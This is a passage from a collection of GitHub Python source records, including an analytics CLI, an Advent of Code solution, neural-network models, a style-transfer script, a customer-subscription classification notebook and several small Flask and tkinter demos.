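 # Each branch below maps the docopt message type onto the matching analytics-python call; JSON-valued options (properties, traits, context, integrations) are decoded with json.loads before being passed through.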
 if msgType == \"track\":\n properties = arguments[\"--properties\"]\n if properties:\n properties = json.loads(properties)\n analytics.track(user_id = userId, anonymous_id=anonymousId, event = arguments[\"--event\"], properties = properties, context = context, integrations = integrations)\n elif msgType == \"screen\":\n properties = arguments[\"--properties\"]\n if properties:\n properties = json.loads(properties)\n analytics.screen(user_id = userId, anonymous_id=anonymousId, name = arguments[\"--name\"], properties = properties, context = context, integrations = integrations)\n elif msgType == \"page\":\n properties = arguments[\"--properties\"]\n if properties:\n properties = json.loads(properties)\n analytics.page(user_id = userId, anonymous_id=anonymousId, name = arguments[\"--name\"], properties = properties, context = context, integrations = integrations)\n elif msgType == \"alias\":\n analytics.alias(user_id = userId, previous_id=arguments[\"--previousId\"])\n elif msgType == \"group\":\n traits = arguments[\"--traits\"]\n if traits:\n traits = json.loads(traits)\n analytics.group(user_id = userId, anonymous_id=anonymousId, group_id = arguments[\"--groupId\"], traits = traits, context = context, integrations = integrations)\n elif msgType == \"identify\":\n traits = arguments[\"--traits\"]\n if traits:\n traits = json.loads(traits)\n analytics.identify(user_id = userId, anonymous_id=anonymousId, traits = traits, context = context, integrations = integrations)\n else:\n raise Exception('Unknown argument')\n\n analytics.flush() # flush() must be called so queued messages are sent before the process exits\n","repo_name":"segmentio/analytics-python-cli","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} {"seq_id":"20172420274","text":"#!/usr/bin/env python3\n\nimport sys\nimport time\n\nclass Node:\n def __init__(self, data, next, prev_numeric):\n self.data = data\n self.next = next\n self.prev_numeric = prev_numeric\n\nclass CLLIterator:\n def __init__(self, cll):\n self.cll = cll\n self.node = cll.head\n self.start = cll.head\n self.first_iter = True\n\n def __next__(self):\n if not self.first_iter and self.node == self.start:\n raise StopIteration()\n self.first_iter = False\n result = self.node.data\n self.node = self.node.next\n return result\n\nclass CircularLinkedList:\n def __init__(self, list):\n self.head = None\n self.tail = None\n self.len = len(list)\n nodes = [None] * len(list)\n prev_node = None\n for i, e in enumerate(list):\n nodes[e - 1] = Node(e, self.head, None)\n if i == 0:\n self.head = nodes[e - 1]\n self.tail = nodes[e - 1]\n if prev_node:\n prev_node.next = nodes[e - 1]\n prev_node = nodes[e - 1]\n nodes[0].prev_numeric = nodes[-1]\n self.head_numeric = nodes[0]\n self.tail_numeric = nodes[-1]\n for i in range(1, len(nodes)):\n nodes[i].prev_numeric = nodes[i - 1]\n\n def __len__(self):\n return self.len\n\n def append(self, val):\n if not self.tail:\n raise RuntimeError('Invalid append')\n else:\n # note: the following assumes that the new value is also the new maximum one\n node = Node(val, self.head, None)\n self.tail.next = node\n if self.tail.data == val - 1:\n node.prev_numeric = self.tail\n else:\n prev_num = self.head\n while prev_num.data != val - 1:\n prev_num = prev_num.next\n if prev_num == self.head:\n raise RuntimeError(f'Could not find prev_numeric for {val}')\n node.prev_numeric = prev_num\n self.tail = node\n self.head_numeric.prev_numeric = node\n self.tail_numeric = node\n self.len += 1\n\n def __iter__(self):\n return CLLIterator(self)\n\n\n\ndef move(cups, current, max_label):\n sel = current.next\n current.next = sel.next.next.next\n destination = current.prev_numeric\n while True:\n if destination not in [sel, sel.next, sel.next.next]:\n prev_next = destination.next\n destination.next = sel\n sel.next.next.next = prev_next\n break\n destination = destination.prev_numeric\n return current.next\n\ndef part1(cups):\n max_label = max(cups)\n cups = CircularLinkedList(cups)\n current = cups.head\n for i in range(100):\n current = 
move(cups, current, max_label)\n cups = list(cups)\n i = cups.index(1)\n pre1 = cups[0:i]\n cups = cups[i+1:]\n cups.extend(pre1)\n return ''.join(map(lambda c: str(c), cups))\n\ndef part2(cups):\n max_label = max(cups)\n cups = CircularLinkedList(cups)\n while len(cups) != 1000000:\n cups.append(max_label + 1)\n max_label += 1\n\n begin = time.perf_counter()\n current = cups.head\n for i in range(10000000):\n current = move(cups, current, max_label)\n end = time.perf_counter()\n print(f'Elapsed time (part 2): {end - begin:0.4f} seconds')\n cups = list(cups)\n i = cups.index(1)\n cw1 = cups[(i + 1) % len(cups)]\n cw2 = cups[(i + 2) % len(cups)]\n return cw1 * cw2\n\ndef main(arguments):\n f = open('inputs/day23', 'r')\n cups = [int(cup) for cup in f.read().strip('\\n')]\n print(f'Part 1: {part1(cups.copy())}')\n print(f'Part 2: {part2(cups.copy())}')\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))","repo_name":"RoBaaaT/advent-of-code-2020","sub_path":"day23.py","file_name":"day23.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} {"seq_id":"13531485444","text":"#! -*- coding:utf-8 -*-\r\n\r\n'''\r\n@Author: ZM\r\n@Date and Time: 2021/6/27 5:52\r\n@File: darknet.py\r\n'''\r\n\r\nfrom torch import nn\r\n\r\nclass ConvBNAct(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size, stride=1):\r\n super(ConvBNAct, self).__init__()\r\n self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride=stride, padding=kernel_size // 2, bias=False)\r\n self.bn = nn.BatchNorm2d(out_channels)\r\n self.act = nn.LeakyReLU(negative_slope=0.2)\r\n\r\n def forward(self, x):\r\n return self.act(self.bn(self.conv(x)))\r\n\r\nclass ResBlock(nn.Module):\r\n def __init__(self, in_channels, channels, num_blocks):\r\n super(ResBlock, self).__init__()\r\n self.num_blocks = num_blocks\r\n self.downsampling = ConvBNAct(in_channels, channels, 3, stride=2)\r\n for i in range(num_blocks):\r\n setattr(self, f'stage{i}',\r\n nn.Sequential(ConvBNAct(channels, channels // 2, 1), ConvBNAct(channels // 2, channels, 3)))\r\n\r\n def forward(self, x):\r\n x = self.downsampling(x)\r\n identity = x\r\n for i in range(self.num_blocks):\r\n x = getattr(self, f'stage{i}')(x)\r\n x += identity\r\n identity = x\r\n\r\n return x\r\n\r\nclass DarkNetBody(nn.Module):\r\n def __init__(self):\r\n super(DarkNetBody, self).__init__()\r\n self.conv_bn_act = ConvBNAct(3, 32, 3)\r\n self.res_block1 = ResBlock(32, 64, 1)\r\n self.res_block2 = ResBlock(64, 128, 2)\r\n self.res_block3 = ResBlock(128, 256, 8)\r\n self.res_block4 = ResBlock(256, 512, 8)\r\n self.res_block5 = ResBlock(512, 1024, 4)\r\n\r\n def forward(self, x):\r\n x = self.conv_bn_act(x)\r\n x = self.res_block2(self.res_block1(x))\r\n fp3 = x = self.res_block3(x)\r\n fp2 = x = self.res_block4(x)\r\n fp1 = x = self.res_block5(x)\r\n\r\n return fp1, fp2, fp3","repo_name":"mengzhu0308/object-detection","sub_path":"yolov3_pt/backbone/darknet.py","file_name":"darknet.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} {"seq_id":"40522472025","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.utils as utils\nimport torch.utils.data as data\nimport torchvision.utils as v_utils\nimport torchvision.transforms as transforms\nimport matplotlib.pyplot as plt\nimport torchvision.models as models\n\nfrom PIL import Image\n# %matplotlib inline 
# drawing at browser 'inline'\n\ncontent_layer_num = 1\nimage_size = 512\nepoch = 5000\n\ndef image_preprocess(img_dir):\n img = Image.open(img_dir)\n transform = transforms.Compose([\n transforms.Resize(image_size),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.40760392, 0.45795686, 0.48501961],\n std=[1,1,1]),\n ])\n img = transform(img).view((-1,3,image_size,image_size))\n return img\n\ndef image_postprocess(tensor):\n transform = transforms.Normalize(mean=[-0.40760392, -0.45795686, -0.48501961],\n std=[1,1,1])\n img = transform(tensor.clone())\n img = img.clamp(0,1)\n img = torch.transpose(img,0,1)\n img = torch.transpose(img,1,2)\n return img\n\n# using pre-trained resnet50\nresnet = models.resnet50(pretrained=True)\n'''\nfor name,module in resnet.named_children():\n print(name)\n'''\n\n\nclass Resnet(nn.Module):\n def __init__(self):\n super(Resnet, self).__init__()\n self.layer0 = nn.Sequential(*list(resnet.children())[0:1])\n self.layer1 = nn.Sequential(*list(resnet.children())[1:4])\n self.layer2 = nn.Sequential(*list(resnet.children())[4:5])\n self.layer3 = nn.Sequential(*list(resnet.children())[5:6])\n self.layer4 = nn.Sequential(*list(resnet.children())[6:7])\n self.layer5 = nn.Sequential(*list(resnet.children())[7:8])\n\n def forward(self, x):\n # chain the six stages so each feature map comes from its own layer\n out_0 = self.layer0(x)\n out_1 = self.layer1(out_0)\n out_2 = self.layer2(out_1)\n out_3 = self.layer3(out_2)\n out_4 = self.layer4(out_3)\n out_5 = self.layer5(out_4)\n return out_0, out_1, out_2, out_3, out_4, out_5\n\nclass GramMatrix(nn.Module):\n def forward(self, input):\n b, c, h, w = input.size()\n F = input.view(b, c, h*w)\n G = torch.bmm(F, F.transpose(1, 2))\n return G\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n# print(device)\n\nresnet = Resnet().to(device)\nfor param in resnet.parameters():\n param.requires_grad = False\n\nclass GramMSELoss(nn.Module):\n def forward(self, input, target):\n out = nn.MSELoss()(GramMatrix()(input), target)\n return out\n\ncontent_dir = 'content.jpg' # placeholder path, point this at a real content image\nstyle_dir = 'style.jpg' # placeholder path, point this at a real style image\ncontent = image_preprocess(content_dir).to(device) # Set content image\nstyle = image_preprocess(style_dir).to(device) # Set style image\ngenerated = content.clone().requires_grad_().to(device) # Set generating image\n# print(content.requires_grad,style.requires_grad,generated.requires_grad)\n\n'''\n\nplt.imshow(image_postprocess(content[0].cpu()))\nplt.show()\n\nplt.imshow(image_postprocess(style[0].cpu()))\nplt.show()\n\ngen_img = image_postprocess(generated[0].cpu()).data.numpy()\nplt.imshow(gen_img)\nplt.show()\n\n'''\n\nstyle_target = list(GramMatrix()(i) for i in resnet(style))\ncontent_target = resnet(content)[content_layer_num]\nstyle_weight = [1/n**2 for n in [64,64,256,512,1024,2048]]\n\noptimizer = optim.LBFGS([generated])\n\niteration = [0]\nwhile iteration[0] < epoch:\n def closure():\n optimizer.zero_grad()\n out = resnet(generated)\n style_loss = [GramMSELoss()(out[i], style_target[i]) * style_weight[i] for i in range(len(style_target))]\n content_loss = nn.MSELoss()(out[content_layer_num], content_target)\n total_loss = 1000 * sum(style_loss) + content_loss\n total_loss.backward()\n if iteration[0] % 100 == 0:\n print(total_loss)\n iteration[0] += 1\n return total_loss\n\n optimizer.step(closure)\n\n
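# LBFGS re-evaluates the objective several times per step, which is why it takes a closure that recomputes the loss and its gradients on every call.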
gen_img = image_postprocess(generated[0].cpu()).data.numpy()\n\nplt.figure(figsize=(10,10))\nplt.imshow(gen_img)\nplt.show()","repo_name":"tinyfrog/pytorch_practice","sub_path":"Transfer/style_transfer.py","file_name":"style_transfer.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} {"seq_id":"74486570561","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[88]:\n\n\n# Importing Libraries\nimport numpy as np # used for numeric calculations\nimport pandas as pd # used for data analysis and manipulation\nimport matplotlib.pyplot as plt # used for data visualization\nimport seaborn as sns \nfrom dateutil import parser # used for converting time into date time datatype\nfrom sklearn.metrics import confusion_matrix, classification_report, accuracy_score\n\n\n# In[25]:\n\n\n# importing dataset\nFinance_Data = pd.read_csv(\"B:\\FineTech_appData.csv\")\n\n\n# In[26]:\n\n\nfeatures = Finance_Data.columns\nfor i in features:\n print(\"\"\"Unique value = {}\\n{}\\nTotal Length = {} \\n........................\\n\n \"\"\".format(i, Finance_Data[i].unique(), len(Finance_Data[i].unique())))\n\n\n# In[27]:\n\n\n#reading first 5 rows of dataset\nFinance_Data.head(5)\n\n\n# In[29]:\n\n\n# reading the data types of features\nFinance_Data.info()\n\n\n# In[36]:\n\n\n# analyzing the data for null values\nFinance_Data.isnull().sum()\n\n\n# In[38]:\n\n\nFinance_Data.dtypes\n\n\n# In[40]:\n\n\n# for data visualizing we need numeric data type.\n# creating another variable to store numeric values\nFinance_Data2 = Finance_Data.drop(['user', 'first_open', 'screen_list', 'enrolled_date'], axis = 1)\n\n\n# In[41]:\n\n\n# reading another numeric variable\nFinance_Data2.head(5)\n\n\n# In[42]:\n\n\n# Data Visualization by HeatMap\nplt.figure(figsize=(16,9)) # heatmap size - ratio 16:9\n \nsns.heatmap(Finance_Data2.corr(), annot = True, cmap ='coolwarm') # show heatmap\n \nplt.title(\"Heatmap using correlation matrix of Finance_Data2\", fontsize = 25) # title of heatmap\n\n\n# In[43]:\n\n\n# Data Visualization by Pairplot\nsns.pairplot(Finance_Data2, hue = 'enrolled')\n\n\n# In[49]:\n\n\nprint(\"User Enrolled = \", len(Finance_Data2) - (Finance_Data2.enrolled < 1).sum()) # total rows minus the not-enrolled count\nsns.countplot(Finance_Data2.enrolled)\nprint(\"User Not Enrolled = \",(Finance_Data2.enrolled < 1).sum())\n\n\n# In[52]:\n\n\n# Data Visualization via Histogram\nplt.figure(figsize=(16,9)) # figure size - ratio 16:9\nfeatures = Finance_Data2.columns\nfor i,j in enumerate(features):\n plt.subplot(3,3,i+1) # creating subplot for histogram\n plt.title(\"Histogram of {}\".format(j), fontsize = 15) # title of histogram\n \n bins = len(Finance_Data2[j].unique()) # bins of histogram\n plt.hist(Finance_Data2[j],bins = bins, rwidth = 0.8, edgecolor = \"y\", linewidth = 2, ) # plot histogram\n\nplt.subplots_adjust(hspace=0.5)\n\n\n# In[53]:\n\n\n# Data Visualization via Bar Plot\nsns.set() # set background dark grid\nplt.figure(figsize = (14,5))\nplt.title(\"Correlating numeric features with 'enrolled' \", fontsize = 20)\nFinance_Data3 = Finance_Data2.drop(['enrolled'], axis = 1)\nax = sns.barplot(Finance_Data3.columns, Finance_Data3.
corrwith(Finance_Data.enrolled))\nax.tick_params(labelsize = 15, labelrotation = 20, color = \"k\")\n\n\n# In[54]:\n\n\nFinance_Data['first_open'] =[parser.parse(i) for i in Finance_Data['first_open']]\n \nFinance_Data['enrolled_date'] =[parser.parse(i) if isinstance(i, str) else i for i in Finance_Data['enrolled_date']]\n \nFinance_Data.dtypes\n\n\n# In[55]:\n\n\nFinance_Data['time_to_enrolled'] = (Finance_Data.enrolled_date - Finance_Data.first_open).astype('timedelta64[h]')\nplt.hist(Finance_Data['time_to_enrolled'].dropna())\n\n\n# In[56]:\n\n\nplt.hist(Finance_Data['time_to_enrolled'].dropna(), range = (0,100)) \n\n\n# In[57]:\n\n\n# Feature Selection\nFinance_Data3 = pd.read_csv(\"top_screens.csv\").top_screens.values\n \nFinance_Data3\n\n\n# In[58]:\n\n\nFinance_Data['screen_list'] = Finance_Data.screen_list.astype(str) + ','\n\n\n# In[59]:\n\n\n# string into to number\n \nfor screen_name in Finance_Data3:\n Finance_Data[screen_name] = Finance_Data.screen_list.str.contains(screen_name).astype(int)\n Finance_Data['screen_list'] = Finance_Data.screen_list.str.replace(screen_name+\",\", \"\")\n\n\n# In[60]:\n\n\nFinance_Data.shape\n\n\n# In[61]:\n\n\n# remain screen in 'screen_list'\nFinance_Data.loc[0,'screen_list']\n\n\n# In[62]:\n\n\n# count remain screen list and store counted number in 'remain_screen_list'\n \nFinance_Data['remain_screen_list'] = Finance_Data.screen_list.str.count(\",\")\n\n\n# In[63]:\n\n\n# Drop the 'screen_list'\nFinance_Data.drop(columns = ['screen_list'], inplace=True)\n\n\n# In[64]:\n\n\nFinance_Data.columns\n\n\n# In[65]:\n\n\n# taking sum of all saving screen in one place\nsaving_screens = ['Saving1',\n 'Saving2',\n 'Saving2Amount',\n 'Saving4',\n 'Saving5',\n 'Saving6',\n 'Saving7',\n 'Saving8',\n 'Saving9',\n 'Saving10',\n ]\nFinance_Data['saving_screens_count'] = Finance_Data[saving_screens].sum(axis = 1)\nFinance_Data.drop(columns = saving_screens, inplace = True)\n\n\n# In[66]:\n\n\n# taking sum of all credit screen in one place\ncredit_screens = ['Credit1',\n 'Credit2',\n 'Credit3',\n 'Credit3Container',\n 'Credit3Dashboard',\n ]\nFinance_Data['credit_screens_count'] = Finance_Data[credit_screens].sum(axis = 1)\nFinance_Data.drop(columns = credit_screens, axis = 1, inplace = True)\n\n\n# In[67]:\n\n\n# taking sum of all cc screen in one place\ncc_screens = ['CC1',\n 'CC1Category',\n 'CC3',\n ]\nFinance_Data['cc_screens_count'] = Finance_Data[cc_screens].sum(axis = 1)\nFinance_Data.drop(columns = cc_screens, inplace = True)\n\n\n# In[68]:\n\n\n# taking sum of all Loan screen in one place\nloan_screens = ['Loan',\n 'Loan2',\n 'Loan3',\n 'Loan4',\n ]\nFinance_Data['loan_screens_count'] = Finance_Data[loan_screens].sum(axis = 1)\nFinance_Data.drop(columns = loan_screens, inplace = True)\n\n\n# In[69]:\n\n\nFinance_Data.shape\n\n\n# In[70]:\n\n\nFinance_Data.info()\n\n\n# In[71]:\n\n\n# Drop the 'screen_list'\nFinance_Data.drop(columns = ['first_open'], inplace=True)\n\n\n# In[73]:\n\n\nFinance_Data.drop(columns = ['enrolled_date'], inplace=True)\n\n\n# In[74]:\n\n\nFinance_Data.drop(columns = ['time_to_enrolled'], inplace=True)\n\n\n# In[75]:\n\n\nFinance_Data.info()\n\n\n# In[107]:\n\n\ntraget = Finance_Data['enrolled']\nFinance_Data.drop(columns = 'enrolled', inplace = True)\n\n\n# In[82]:\n\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(Finance_Data, traget, test_size = 0.2, random_state = 0)\n\nprint('Shape of X_train = ', X_train.shape)\nprint('Shape of X_test = ', 
X_test.shape)\nprint('Shape of y_train = ', y_train.shape)\nprint('Shape of y_test = ', y_test.shape)\n\n\n# In[85]:\n\n\n# take User ID in another variable \ntrain_userID = X_train['user']\nX_train.drop(columns= 'user', inplace =True)\ntest_userID = X_test['user']\nX_test.drop(columns= 'user', inplace =True)\n\n\n# In[86]:\n\n\nprint('Shape of X_train = ', X_train.shape)\nprint('Shape of X_test = ', X_test.shape)\nprint('Shape of train_userID = ', train_userID.shape)\nprint('Shape of test_userID = ', test_userID.shape)\n\n\n# In[87]:\n\n\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train_sc = sc.fit_transform(X_train)\nX_test_sc = sc.transform(X_test)\n\n\n# In[89]:\n\n\n# Decision Tree Classifier\nfrom sklearn.tree import DecisionTreeClassifier\ndt_model = DecisionTreeClassifier(criterion= 'entropy', random_state=0)\ndt_model.fit(X_train, y_train)\ny_pred_dt = dt_model.predict(X_test)\naccuracy_score(y_test, y_pred_dt)\n\n\n# In[90]:\n\n\n# K- Nearest Neighbor Classifier\nfrom sklearn.neighbors import KNeighborsClassifier\nknn_model = KNeighborsClassifier(n_neighbors=5, metric='minkowski', p=2,)\nknn_model.fit(X_train, y_train)\ny_pred_knn = knn_model.predict(X_test)\n \naccuracy_score(y_test, y_pred_knn)\n\n\n# In[91]:\n\n\n# Naive Bayes Classifier\nfrom sklearn.naive_bayes import GaussianNB\nnb_model = GaussianNB()\nnb_model.fit(X_train, y_train)\ny_pred_nb = nb_model.predict(X_test)\n \naccuracy_score(y_test, y_pred_nb)\n\n\n# In[92]:\n\n\n# Random Forest Classifier\nfrom sklearn.ensemble import RandomForestClassifier\nrf_model = RandomForestClassifier(n_estimators=10, criterion='entropy', random_state=0)\nrf_model.fit(X_train, y_train)\ny_pred_rf = rf_model.predict(X_test)\n \naccuracy_score(y_test, y_pred_rf)\n\n\n# In[93]:\n\n\n# Logistic Regression Classifier\nfrom sklearn.linear_model import LogisticRegression\nlr_model = LogisticRegression(random_state = 0, penalty = 'l1')\nlr_model.fit(X_train, y_train)\ny_pred_lr = lr_model.predict(X_test)\n \naccuracy_score(y_test, y_pred_lr)\n\n\n# In[94]:\n\n\n# Support Vector Machine\nfrom sklearn.svm import SVC\nsvc_model = SVC()\nsvc_model.fit(X_train, y_train)\ny_pred_svc = svc_model.predict(X_test)\n \naccuracy_score(y_test, y_pred_svc)\n\n\n# In[95]:\n\n\n# XGBoost Classifier\nfrom xgboost import XGBClassifier\nxgb_model = XGBClassifier()\nxgb_model.fit(X_train, y_train)\ny_pred_xgb = xgb_model.predict(X_test)\naccuracy_score(y_test, y_pred_xgb)\n\n\n# In[99]:\n\n\n# Among all classifiers, XGBoost ML Model gave better results \n\n\n# In[101]:\n\n\n# confussion matrix\ncm_xgb = confusion_matrix(y_test, y_pred_xgb)\nsns.heatmap(cm_xgb, annot = True, fmt = 'g')\nplt.title(\"Confussion Matrix\", fontsize = 20) \n\n\n# In[102]:\n\n\n# Clasification Report\ncr_xgb = classification_report(y_test, y_pred_xgb)\n \nprint(\"Classification report >>> \\n\", cr_xgb)\n\n\n# In[104]:\n\n\n# Cross validation\nfrom sklearn.model_selection import cross_val_score\ncross_validation = cross_val_score(estimator = xgb_model, X = X_train_sc, y = y_train, cv = 10)\nprint(\"Cross validation of XGBoost model = \",cross_validation)\nprint(\"Cross validation of XGBoost model (in mean) = \",cross_validation.mean())\n\n\n# In[103]:\n\n\nfinal_result = pd.concat([test_userID, y_test], axis = 1)\nfinal_result['predicted result'] = y_pred_xgb\n 
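# pd.concat aligns test_userID and y_test on the row indices they kept from train_test_split, so the user IDs, true labels, and predictions line up row by row.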
\nprint(final_result)\n\n","repo_name":"BarreraNazir/Customer-Subscription-Behavior-Analysis","sub_path":"Customer_Subscription_Behavior_Analysis.py","file_name":"Customer_Subscription_Behavior_Analysis.py","file_ext":"py","file_size_in_byte":9568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"23833663583","text":"from flask import Flask,render_template\nfrom flask_assets import Bundle, Environment\n\n\napp = Flask(__name__)\n\njs = Bundle('home.js', 'add.js', 'subtract.js', output='gen/main.js', filters='jsmin')\ncss = Bundle('main.css', 'style.css', output='gen/main-style.css', filters='cssmin')\nassets = Environment(app)\nassets.register('main_js', js)\nassets.register('main_css', css)\n\n@app.route('/')\ndef index():\n\ttitle = 'Assets'\n\n\treturn render_template('assets.html', title=title)\n\nif __name__=='__main__':\n\tapp.run(debug=True)","repo_name":"bionicdev/Flask-Jinja","sub_path":"assets_bundle_minifying.py","file_name":"assets_bundle_minifying.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"4599383482","text":"import tkinter as tk\nfrom tkinter import ttk\n\n# Initializing the main window\nroot = tk.Tk()\n\n# Defining the main frame which is aligned to left\nmain = ttk.Frame(root)\nmain.pack(side=\"left\", fill=\"both\", expand=True)\n\n# Putting 2 labels into the frame, the labels are aligned to top\ntk.Label(main, text=\"Label top\", bg=\"green\").pack(side=\"top\", fill=\"both\", expand=True)\ntk.Label(main, text=\"Label top\", bg=\"blue\").pack(side=\"top\", fill=\"both\", expand=True)\n\n# This label is in the main window, so touches the right side of the frame\ntk.Label(root, text=\"Label left\", bg=\"red\").pack(\n side=\"left\", fill=\"both\", expand=True\n)\n\n# Running the main window\nroot.mainloop()\n","repo_name":"pandrey2003/PyExercises","sub_path":"GUI/frames.py","file_name":"frames.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"98"} +{"seq_id":"25399770780","text":"# quicksort complexity purely depends upon the pivot element that we choose\n# for average case the time complexity to sort is O(n*logn)\n# and for worst case the time complexity is O(n^2)\ndef quicksort(arr):\n if len(arr) < 2:\n return arr\n else:\n pivot=arr[0]\n less = [i for i in arr[1:] if i <= pivot]\n greater = [i for i in arr[1:] if i > pivot ]\n return quicksort(less) + [pivot] + quicksort(greater)\n\n# making testcases\n\ndef test(mine, expected):\n assert mine == expected, f'mine: {mine} vs expected: {expected}'\n\n\nx = test(quicksort([10, 5, 3, 2]), [2, 3, 5, 10])\nprint(x)","repo_name":"keshkaush/python_data_structure","sub_path":"quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"30547863231","text":"from hashlib import sha1\nfrom pathlib import Path\nfrom typing import Iterable, NamedTuple, Union\n\nimport torch\nfrom ranking_utils.model.data import DataProcessor\nfrom torch_geometric.data import Batch as tgBatch\nfrom torch_geometric.data import Data\n\n# from torch_geometric.utils.convert import to_scipy_sparse_matrix\nfrom transformers import DistilBertTokenizer\n\nfrom .graph_construction import GraphConstruction\n\n\nclass Input(NamedTuple):\n doc: str\n query: str\n\n\nclass 
Batch(NamedTuple):\n docs: dict[str, torch.LongTensor]\n queries: dict[str, torch.LongTensor]\n doc_graphs: Data\n\n\nclass ProposedDataProcessor(DataProcessor):\n def __init__(\n self,\n graph_construction: GraphConstruction,\n query_limit: int = 10000,\n cache_dir: Union[str, Path, None] = \"./cache/graphs/\",\n append_mask: int = 0,\n device: Union[str, None] = None,\n ) -> None:\n super().__init__()\n assert isinstance(graph_construction, GraphConstruction), \"invalid type for graph_construction\"\n self.query_limit = query_limit\n self.cache_dir = Path(cache_dir) if cache_dir else None\n self.graph_construction = graph_construction\n self.tokenizer: DistilBertTokenizer = DistilBertTokenizer.from_pretrained(\"distilbert-base-uncased\")\n self.append_mask = append_mask\n self.device = device\n\n if self.cache_dir:\n self.cache_dir.mkdir(parents=True, exist_ok=True)\n\n @torch.no_grad()\n def _construct_graph_or_load_from_cache(self, doc: str) -> Data:\n if self.cache_dir is None:\n return self.graph_construction(doc, device=self.device)\n # We can't use python's hash here since it is not consistent across runs\n # key = hash(doc).to_bytes(8, \"big\", signed=True).hex()\n key = sha1(doc.encode(), usedforsecurity=False).hexdigest()\n cache_file = self.cache_dir / f\"{key}\"\n if cache_file.exists():\n data = torch.load(cache_file)\n assert isinstance(data, Data)\n else:\n data = self.graph_construction(doc, device=self.device)\n torch.save(data, cache_file)\n\n return data\n\n def _construct_doc_batch(self, docs: list[str]) -> Data:\n batch = tgBatch.from_data_list([self._construct_graph_or_load_from_cache(doc) for doc in docs])\n assert isinstance(batch, Data)\n return batch\n\n def get_model_input(self, query: str, doc: str) -> Input:\n query = query.strip() or \"(empty)\"\n doc = doc.strip() or \"(empty)\"\n # Mimick some query expansion by adding masks to the query\n # (https://github.com/sebastian-hofstaetter/neural-ranking-kd/blob/main/minimal_colbert_usage_example.ipynb)\n return Input(doc=doc, query=query[: self.query_limit] + \" [MASK]\" * self.append_mask)\n\n def get_model_batch(self, inputs: Iterable[Input]) -> Batch:\n docs, queries = zip(*inputs)\n doc_in = self.tokenizer(docs, padding=True, truncation=True, return_tensors=\"pt\")\n query_in = self.tokenizer(queries, padding=True, truncation=True, return_tensors=\"pt\")\n\n return Batch(\n docs={\"input_ids\": doc_in[\"input_ids\"], \"attention_mask\": doc_in[\"attention_mask\"]},\n queries={\"input_ids\": query_in[\"input_ids\"], \"attention_mask\": query_in[\"attention_mask\"]},\n doc_graphs=self._construct_doc_batch([input.doc for input in inputs]),\n )\n","repo_name":"TheMrSheldon/GBaRD","sub_path":"experiments/proposition/_processor.py","file_name":"_processor.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"98"} +{"seq_id":"18844555580","text":"# codinf:utf-8\nfrom flask import Flask, render_template, Response, request\nimport serial\nport = \"/dev/ttyACM0\"\napp = Flask(__name__)\nsingle = serial.Serial(port, 9600)\nsingle.flushInput()\n\n\n@app.route('/')\ndef index():\n single.flushOutput()\n single.flushInput()\n single.write('8')\n response = str(single.readline().decode())\n if response.startswith('hum:'):\n # cut int num\n hum = response[5:7]\n tem = response[-6:-3]\n templateData = {\n 'tem': tem,\n 'hum': hum\n }\n print(response.strip('\\n'))\n return render_template('index.html', 
**templateData)\n\n\n@app.route('/fopen', methods=['POST', 'GET'])\ndef fopen():\n if request.method == 'GET':\n return render_template('index.html')\n else:\n single.flushOutput()\n single.write('1')\n return \"Open OK\"\n\n\n@app.route('/fclose', methods=['POST'])\ndef fclose():\n single.flushOutput()\n single.write('2')\n return \"Close OK\"\n\n\n@app.route('/lclose', methods=['POST'])\ndef lclose():\n # single.flushOutput()\n # single.write('3')\n return \"LED Close OK\"\n\n\n@app.route('/lopen', methods=['POST'])\ndef lopen():\n # single.flushOutput()\n # single.write('4')\n return \"LED Open OK\"\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080, debug=True, threaded=True)\n","repo_name":"StarFishing/ardunio","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"98"} {"seq_id":"8179359250","text":"from flask import Flask, request, abort\nfrom flask_restful import Resource, Api\n\nimport click\n\nimport serial.tools.list_ports\n# import json\n\napp = Flask(__name__)\napi = Api(app)\n\ntodos = {}\n\n\n@click.command()\n@click.option('-p', default=5000, help='Port Number')\ndef startup(p):\n \"\"\"Start the REST API server.\n\n :param p: port number to listen on\n :return: None\n \"\"\"\n app.run(host='0.0.0.0', port=p, debug=True)\n\n\nclass SimpleRest(Resource):\n def get(self, todo_id):\n return {todo_id: todos[todo_id]}\n\n def put(self, todo_id):\n todos[todo_id] = request.form['data']\n return {todo_id: todos[todo_id]}\n\n\nclass serialDevices(Resource):\n \"\"\"\n Class that returns the ports connected to the device.\n\n \"\"\"\n def get(self, nome=None):\n # When the name is not passed in the url, it returns all the available\n # ports.\n if not nome:\n # Returns list in format: ('device', 'name', description).\n devices = 